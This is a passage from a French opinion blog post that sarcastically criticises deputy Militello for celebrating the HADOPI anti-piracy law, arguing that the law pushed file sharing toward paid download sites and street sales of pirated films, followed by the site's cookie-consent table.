C’était là vos deux seuls arguments, c’est franchement léger pour une personne qui se gargarise ainsi d’avoir contribué à sauver la « création sur Internet » si je me fie au titre de la rubrique dans laquelle se trouve votre chef d’oeuvre.

Mais pourquoi ce billet ?

En se réjouissant de la sorte, la député Militello se rappelle aussi au bon souvenir du Président de la République pour lui signifier qu’elle a été un bon soldat… je pense que le message est passé pas de problème là dessus… enfin pas de problème s’il y avait une seule once d’argumentation, une seule référence valide… pour infirmer un FAIT : HADOPI favorise le commerce illicite d’oeuvres culturelles sur le dos des artistes :

En enrichissant Megaupload, Rapidshare etc …
Si vous preniez le métro vous découvriez même que grâce à HADOPI, on peut s’y offrir toutes les dernières productions hollywoodiennes en Divx pour un coût dérisoire (au moins ça permet à quelques personnes de vivre…. mais surement pas les artistes).

Bravo madame Militello d’avoir tué l’échange de fichiers sur les réseaux P2P pour encourager une économie criminelle, nous n’y serions pas parvenu sans vous.

La moindre des choses quand on lance ce genre de billet d’humeur est de l’argumenter un minimum pour qu’il ne soit pas perçu comme une stupide provocation totalement inutile. Enfin, se réjouir d’une conclusion affirmant l’inutilité de consulter l’ARCEP est ici encore d’une grande maladresse, je doute que le gendarme des télécoms apprécie ces gargarismes.

Cookie	Durée	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.